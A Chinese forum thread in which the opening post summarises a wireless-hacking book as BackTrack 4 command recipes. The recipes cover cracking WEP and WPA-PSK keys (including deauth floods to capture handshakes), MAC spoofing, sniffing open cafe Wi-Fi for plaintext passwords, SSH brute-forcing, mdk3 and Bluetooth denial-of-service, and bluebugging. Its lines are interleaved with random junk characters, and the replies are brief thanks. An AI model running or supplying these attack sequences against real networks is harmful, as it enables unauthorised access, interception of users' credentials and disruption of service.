搜索
格西欧解决方案
树熊
查看: 8882|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。0 B* R$ o2 z& q/ b5 u8 W

+ Y) }4 Y% W5 T% A2 P0 j: ?以下所有操作均在BackTrack 4中进行。
. l' E+ F1 C. Z- y3 c3 k
+ T' C3 u) j- {: q/ K5 ?% ]
, A8 I0 r. p- P4 x9 ?( _8 Y4 B无线WEP加密P解:
$ Z8 g# A( b7 G$ c0 M9 ]% t
8 ]6 j; X# t4 B7 m- Y注入P解:
$ l7 X+ c- B! U5 m  V8 K3 m: ]$ E8 ?' e% J$ O+ h* K
ifconfig$ r* h. Y, S$ s' F4 l( f6 |+ X( z
' l4 f& q, x' \# Q+ y+ H- v
ifconfig –a+ ^. \- Z8 u$ K# q- U

& Z0 q& g6 @9 O7 S' }0 ?ifconfig wlan0(无线网卡) up
4 ~6 H9 o; q- C6 o5 u, p4 |: C9 Z% v: @2 F5 s% f" A' [
airmon-ng start wlan0, p* s  S% D" s7 Q9 k1 H" B8 c

$ C& y0 E# `3 X- Gairodump-ng mon0
8 c& y- y+ E3 o3 ^2 E: }/ ^$ p
airodump-ng --ivs –w ivsfile –c 频道 mon0或+ f4 B, ?% ?3 |/ i7 e$ Q

; U( m6 I% \: Mairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0, O2 Y, F; @$ N' ~; p/ n
8 N* J5 c' y" L* t: h- [3 C
aireplay-ng -3 –b BSSID –h Station mon04 _9 O" h0 K% O" m+ Y2 R

6 }0 ]( z% a1 W2 u5 Taircrack-ng ivsfile-01.ivs
% ?. r4 z! g! u2 X* b) U' M! k: p# I9 u
虚连接P解(适用于无客户端连接APP解)
, K) @1 x0 G, I* l
0 u, r& B/ W4 O* o! _ifconfig
1 E, f8 Q1 A; z# V6 ]1 h+ i
) J0 u4 F: t. T0 O6 Zifconfig –a4 p% l8 o' b( U+ G+ t
& c! ?( z9 q; r& R
ifconfig wlan0(无线网卡) up
/ Y$ L: {+ B2 e' {
, [: M' e) Z% U- H! S/ Yairmon-ng start wlan0
) v3 y2 e% v8 W* e$ {; i! `$ c) j2 Y, z- Y' P2 {" h
airodump-ng mon0
) ]3 C% u7 R2 d% r
4 G/ j1 g: F. _( y& @" \. H4 @airodump-ng --ivs –w ivsfile –c 频道 mon0或
, h+ |2 |5 W% i$ B% E0 x/ Z; Y: c$ O$ {8 E# x7 E2 @
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
( W8 i: ^) [0 f1 i' U& t1 P/ V6 Z2 W
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
/ ]& r8 j* [( Q) z# ~% _( w8 t  I9 Q4 h
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon00 I& P& L# Z' Z7 b7 i: U: _& G) D

( t* @& C- L- Q+ z2 z; aaircrack-ng ivsfile-01.ivs) R/ G+ c; o4 U: h+ E. W; }

: t) ]  I2 T( r7 C+ d4 a' f' O9 H. b: l! G
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。6 R% o- h! M% u& x% x5 C* r5 g3 q* R

, q/ p1 Y. t9 T' i" \- h4 t* N" j  {3 D% s/ ]
WPA-PSKP解; D1 J& d2 i, G: R4 P( u7 W

$ Q! y/ M! E- iifconfig/ v5 l8 }# b5 B4 m; P1 Y4 y
8 o- k5 V' h1 q6 B
ifconfig –a! f% f* n" Q6 o0 s% _( j
  O3 o5 B  B7 y6 ]" ~
ifconfig wlan0(无线网卡) up
: A: \8 g9 g# O
$ i, E. U8 ~4 n( u. Iairmon-ng start wlan09 \6 b% y: R0 L! I# ~

* ~5 {  d0 V3 Sairodump-ng mon0
6 _$ W" C( S: o* Y+ J: @% C& h2 k/ S; C6 V  `1 C: O  R. J
airodump-ng –w capfile –c 频道 mon0* @4 O( T3 \( U8 V* H

, |6 ^9 ~2 q- xaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包9 G9 r2 x* @* T% H1 B* Y6 Q6 w
! K- p& f/ w4 g" d( I
aircrack-ng –w Dic capfile-01.cap或! k4 D( `$ O% r# Y, W" ^" f1 m
! G0 H- t/ s! J' p: w
cowpatty –f Dic –r capfile-01.cap –s SSID
9 v! Z- {5 }' \3 B" I; T) j8 G% c/ L
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID1 o$ i) W* o! L1 V6 m

; a' w- }9 ^/ ~( o* D. k, K傻瓜式P解软件SpoonWPA。
8 i  p& g- [4 L" P1 b. R  H: P0 Z* b- n. s  T* ^. w' [( s$ I1 L
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst9 {" Q8 B/ u; d- U* f
1 L4 h$ B$ X9 f: I* P5 Q1 j

- P; n8 Y# I. ]( J9 @字典文件的生成和上传# g* v' K9 Z+ a

4 F9 O; r: J  K- [  ?( w3 Z在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
' f" k' r: W/ b0 h' H+ E, n4 v8 {
3 T# k! m9 Z& i$ n* M# G
0 Z4 b' y# Q" t6 R2 MBT4下开启Tftp:Services—TFTPD—start TFTPD
' ^9 t; V5 _: |# w; ^
; Z0 ]. \: g: C/ M, W* e4 A在Windows的CMD中运行 tftp –i IP put **.dic
7 f- V. ?: D5 j
" D* {" I5 @' e$ H# ~2 k
& @  l4 W" W5 P( f/ fBT4下开启SSH:Services—SSH—start SSH
, G  R; ]/ W: B6 @/ e7 o
& c3 A& z1 p2 `3 H- c& Q3 JWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root; r" L% P' u) G2 a" Y: i* z) `) j

8 [: h. d- ?7 m- B& @* N* X  A
# |1 s! U8 e, U: a7 D7 L! X, }9 K- OAP限制MAC时的解决
2 ]9 [6 J* |. R' L2 q3 a' r1 y! p5 }8 [1 W# k7 o+ N
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:9 h) r6 U1 |/ s- G1 u
5 b. Z, @3 w2 z* o7 Z. {$ ?
ifconfig wlan0 hw ether NewMAC* o5 |- ]. V& D% q% {; s7 n3 T
' M; i8 ?# b: r9 Y, g: x) |
; l8 N! e, v. _/ E! ?8 G" t- x/ G
关闭SSID广播的AP探测:
# B! }' D. @3 E4 T- _2 u) a
3 o3 A, F1 ~7 `) [: T9 N% |1.     Deauth攻击:
( ^5 M4 C+ K$ u8 ?$ {# c6 S2 s4 \
3 |7 h% _$ P# T2 l" Hairodump-ng mon0
" H# c& K, z+ Y; c
  n* d( n8 k, S# x( A/ f; ^3 k5 caireplay-ng -0 10 –a BSSID –h Station mon0
6 m/ K' c8 D' ~, d) M: e3 |3 i4 j; k! {( M5 O5 F4 _& y
2.     抓包分析* V% {9 T/ C% s2 z
+ W+ `0 K3 R+ \
Omnipeek/ _* c- l6 d" c0 n0 `

' i& J. m8 h: R3 g, A8 T* o/ iTcpdump –n –e –vvv –i 网卡名% O7 M* R# n9 o5 p. k
# C( H+ u/ D5 u% N
3.     暴力P解: D7 o1 |3 ?4 j

# b& w4 G9 s2 c9 M5 [Charon 1.1暴力P解7 c" \9 w) J. Z6 ~7 C  m
; K' ]3 J9 `3 H. @

: s2 }) o% ^& d9 @& `" g无线加密数据包的解密
+ T0 c% Q1 _* J* s, b
- I- h2 g, |) ]4 J2 b# P, O) a8 f3 }
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
9 ?* e3 M7 T. |! {5 X6 W- `* p2 h9 t/ g! \) U' N
FilterNS     DNS解析数据包
& x; G7 P* W- ^1 y3 p7 r1 ?1 L) V0 y& n, T
Filter:HTTP    WEB访问数据包
* }( S4 p5 L% g  O, x$ I6 d1 [- y, o
! _& Q2 Q6 i  j& tFilter:msnms   MSN
" _" q/ W: d3 j4 @! N
9 |8 e" e; m  Z4 p. k- g/ iCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。0 k4 z9 S5 D3 r) w2 i& A# q7 {" A; D
) ]. ?4 Y* ?; ?; P
使用airdecap-ng解密:2 C; e9 {( W9 [7 ~8 [6 T

/ }* T6 `+ s& fAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
( {! @- T  B  e, Z; W9 e2 m  l9 ^" j# v

* o% U5 m: E+ o' R( G! \咖啡馆中无线数据截取(开放式无加密AP)$ g0 i% h2 r8 m
5 O3 k1 h+ {  @5 k9 r
1.Airodump-ng –w data –c频道 mon0) V& V6 t$ ^& W) E" ]+ _
" ~8 _5 H7 f+ _* D
2.使用WireShark打开分析+ t! r- R8 o9 e. l  _

0 h2 j+ n  r8 C9 S! e+ p- L2 B4 Z1 i( v3 O7 t" N6 {1 ]- C
BT4下的渗透工具:- b0 ]! }( d  _' h# y4 y% \: A

) X: P. B2 y) q# H* Hnmap –sP IP/24        判断C段下存活的主机 # i0 E) D! J  s$ ]

" @$ V" f5 G% k2 O$ R1 S# anmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
# U- G' b- z4 \
9 O4 m: F( {5 Vnmap –vv –sV IP –p port   指定端口的详细信息。。。  s4 O; a$ v. L& j# l) l6 x/ X
& F; Z0 r* [- N9 c/ H. h- W
namp –O IP/24    判断主机的系统版本
2 y, b1 V. z* a
& b0 t* [' a: s+ b# X& M' y# d5 \* B* Z
GUI 版nmap:Zenmap   x3 m5 q8 I6 e; s4 }

2 p: S9 |3 p' k6 a, F3 E# j- R* P7 [( Y( Y9 ]
Amap使用:amap –B IP port1 D  L) K- y6 {8 Q. }3 T: H

8 V6 N+ X  J7 @. g2 P1 J9 I+ z7 dNbtscan(扫描Windows网络NetBios信息):
' ^# {- O9 n  J& S5 S
! p5 Y0 s8 U! U) c" G/ M  Nnbtscan –v –s : IP/24
. i5 ^  K+ M4 z5 K6 c, F% [3 q6 F3 e8 Q' i
nbtscan –r IP
5 Q+ r6 z* z3 D7 V* t
  Y4 ]' {3 u& @* x' J. A7 l& U% J5 O" L: V8 f$ G
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
. C0 b8 U1 g7 v2 K! d0 m8 S; b) H7 ~! ], w& _4 \
7 H% Q3 d( I5 y! l' f. G; Q
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
/ \( P( X' ]5 Z! E5 {" ~$ d  Z3 ?, i8 \6 o1 f9 ^
BruteSSH: ./bruthe.py –h IP –u Username –d Dic2 V$ M9 i; A6 n, ^

9 ]! p8 Q  b: L$ ?Metasploit3使用. w0 }% c8 C+ Q8 f) V
无线D.0.S* Q6 k2 V( `& V; v' f: M! t" _/ C

# Y! U: ?/ h% p& o# x, L6 Z/ P. F2 B( V1 W& d
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)0 _4 b6 P/ a4 k) W+ d! r

3 u) E+ c6 i( }* N# j  x4 Jairmon-ng start wlan0' v7 ?6 N$ ^. ~) n  r- ~
0 b8 V: @' E9 u/ q. E) c) U
airodump-ng mon0' E) \9 A4 _' z) t9 T: F; Q; Q
" w; q. R3 ]9 D" N# e4 d
mdk3 mon0 a –a BSSID
, x: x/ {. l! e, g5 q; Y9 _1 `) x- m4 Z: N9 _+ n, c
对所有的AP攻击:mdk3 mon0 a7 e/ U( u  E: r% W- l* m

! y2 }. V" G3 ?) k4 p3 s& r& I* f& H$ r% U( d% S! f; W
Deauth Flood 攻击' S, C4 p0 Q! y! N

( d  ~- M8 ?- U2 F7 \mdk3 mon0 d –c Channel
0 K/ W5 }1 {& l  J! j! x5 i) g* @) s6 Z) `% X+ A, ^" X: |& y: u
图形化D.O.S攻击:Charon
+ Z4 m5 Z# V( t4 C' |2 `
5 ~, \) B  Y  g4 I4 u* p, \; `
: k1 z, z; e$ p, z当受到攻击时,使用Wireshark抓包可以看到异常信息。) c1 b" @' p  B3 j$ U

& R' j! g2 C# m# X" B& y) p0 F: g8 J
' e/ T5 d1 j+ x; lWPA-PSK高速P解: L1 N, @+ {0 L2 {: U' k
  R: U. P7 }3 K7 Q& t
1.       WPA-PSK PMK Hash TablesP解
6 |# Y7 v! j+ s5 }2 z" p6 R
' v( ^& _4 Y/ A& v% r9 r4 L) zCowpatty –d HashTable.hash –r ***.cap –s SSID# Z+ e) x: o8 i7 v, ~6 @

. k9 d* h0 k! q- a: Q" O+ Y! O; m% uHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID# w) L# y  V  v- r, D5 X
$ u1 F4 Z$ ?0 G
2.       GPU辅助高速P解
" Z7 w% ?" @9 a; |  }5 |# s) x
/ H/ {6 H2 A" H8 Z5 a" q% ]; H2 P使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。* U; R# D7 q/ c( O; R" s1 m
- R% D) ~3 t/ Q3 d  |3 [
3.       分布式P解1 ?! \; c6 v& n" q' W/ i

1 w3 C3 {- l& @- Q4 L  `4 c; Y' J" w  w! {* K1 i! X( ]
AP的伪造) ~6 A0 O7 r; }
  V2 r( `9 a2 y6 H, o" b) f
把AP的MAC改成目标AP的MAC
% k& S7 Z  O+ p' P; I6 K
/ P$ |6 w: m. `- z- Q网卡软AP
. O+ }( ^/ P# p# s: B1 b* M
. c: u: R) K( [- X( ]- ]9 X! R+ q9 r) T# }: I: [
伪造大量虚假AP信号:
+ _/ R7 P0 I4 t" U; O
; R) ?' q8 p9 G& X/ F' x随机SSID:mdk3 mon0 b –g –c 频道
/ ]2 M. B3 j5 {- B% {, H. f" A7 B% u2 h5 ~8 Y
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
0 Q$ g" F5 x% ~6 K+ P7 r7 O
2 [" a7 n/ u" B( L
# k5 I( d- h# Y/ E$ V. tWar-Driving( Y% ~! B7 X$ H

; i9 o! _8 m, @  |6 d: ~热点地图绘制: ^* Y, c8 P# h+ ?" \

# }" S, v4 }8 b8 D( |# SWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
( s8 v4 K9 s* U* [/ F3 H6 \
% d; n. h9 t3 s5 C( E& \: S; [4 k- j) @3 ?4 h% ]1 G
Netstumble" t1 p8 d6 n$ Z1 O

' V3 c+ l- ]6 [. T. @. Y; q( a: O; [0 o8 h; V/ X- C- G5 Y
蓝牙Hacking
2 k5 `2 p+ B1 g
( j( e0 Z1 i5 h! v7 w* q; Z4 ^Windows下的Blue Soleil工具
2 w; v- O1 \' _+ G; r) ]# t- v  K
$ K6 W6 Q( @" a  P- X$ K" W( K; bBT4:) ~1 q- k9 X) Z$ l- |: |6 D$ y( S

: k. Q, L+ x! R: V" ~hciconfig 查看蓝牙适配器- I, t5 `5 U' s) M' e" H" \( Q

1 P0 u/ H# b/ ~0 {  p% s) a" xhciconfig hci0 up 载入蓝牙适配器
7 y% u9 }6 a9 O+ z" m3 Z
3 k3 [% V8 j; h/ S3 uhciconfig hci0 class 蓝牙适配器详细信息: ]6 C  A6 U6 @( }% `4 e8 n1 ?
9 K3 Q, |3 M  ?( c/ [, b2 N

5 |) G2 J' n& Ehcitool(扫描蓝牙)
+ @; J& A# p2 V2 t* h. }, r" H/ B- ]: H% y7 Z
hcitool –i hci0 scan& W: z- G2 G1 m

( u9 V$ J9 {7 i( UBTscanner(扫描蓝牙)
  I$ Z: E; W5 @9 H- s' {( {: m' @7 x* j$ _- S0 p
( A1 L# q6 m' X9 a0 P
蓝牙攻击:& F6 a# ~3 F: u& L0 O4 `
: m9 _" t( z& _  k" L
BlueBugging (适用于BlueTooth V1.1的手机)
8 C% c7 T! X! [4 I' J/ u7 t& d# u: M. x) _9 k9 a$ \/ V' l
Bluebugger工具:
( R- F+ y+ f- R
0 n' g7 v$ _; Q3 u1 vBulebugger –a HD_Addr info
; H& {' m5 q' b- P. I- l1 J& F; B0 u( H9 t: a: t

1 X' W9 S1 ^+ D) NBlueJacking
. h1 m2 z/ Z" K
% L2 u; n" ?) |/ T9 V实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
9 |& `6 |# _* f5 L/ l9 `6 ~4 E$ t' T/ d; M
1 ?5 j; Q# r$ o, v2 m
HD_Addr修改:
1 o$ l  s" A' I& I# }+ E9 k  V( Q7 p; {6 P1 ~# b$ m
Bdaddr工具! r) ]* m$ b7 N( @0 {

; q7 t$ z3 K: sbdaddr –i 蓝牙设备名 新HD_addr
* _9 W: U8 P' l1 J$ M% {
9 ]9 L3 \+ m& a( N' U* ]. p, y  W
! N; U: |$ ~0 b4 v' J蓝牙D.O.S
  f) c' D' {1 A  ^8 G5 |8 g) V( [  a0 R; q4 P4 |9 f
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
# B0 i  O& |  k" i9 z: @# X
7 M8 I* j0 I  V0 E/ n' H2 N3 Phciconfig7 ], \; s) O" z- }/ c

' A$ u* @: x" a/ r6 h9 ehciconfig hci0 up% {% @6 |9 p6 A" f1 H
8 n+ M  q/ a3 U) ]
hcitool –i hci0 scan
3 j2 b% a9 T4 Y0 r- v( e6 L1 @) z9 L# U5 s$ [- l' N
l2ping –s 10000 –目标MAC1 H8 L8 R& S! k) T# X) B

; r1 i  L6 Y0 ~  [2 L; ~2 t  k) M2 @, G1 p6 e$ q7 {3 l9 S
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
( v# N4 R6 B& c4 j* H* {5 I5 w) h' W, E! t( U
./fang –r ************-############ -s( B& L+ J% A$ V1 ^

# y- C, L. E5 o9 h5 x! J暴力P解************-############的蓝牙设备! n/ H: l$ \( j3 z1 y

: a9 c; c# P. F/ s" J+ f# o  C% g./fang –l 各厂商BD_Addr分配- m' k- z7 H6 T; N) J: R, D- k& K

1 Y4 v/ z% j, y
- Y5 K) l: z: u! M% tWifiZoo使用
9 _8 j( g. o# P2 h- ^6 D" P* j
: b% _2 H: M( d  u# m. X# i./wifizoo.py –c Capfile1 t3 H, Q) j! W! b/ |8 i) R, |

8 b9 U" ]" [( {/ N# R访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1114

积分

上尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

694

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
9 @1 R+ D( @% q6 l, Y1 \1 l借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
& p  [  ~" R2 @# G) G# V# j呵呵 其实也不贵 21块 快递再一点, j( m% P' w5 W% p' B7 ~
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

关闭

从旁人的错误中可以学到聪明 上一条 /1 下一条

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-10-25 19:08 , Processed in 0.166530 second(s), 14 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表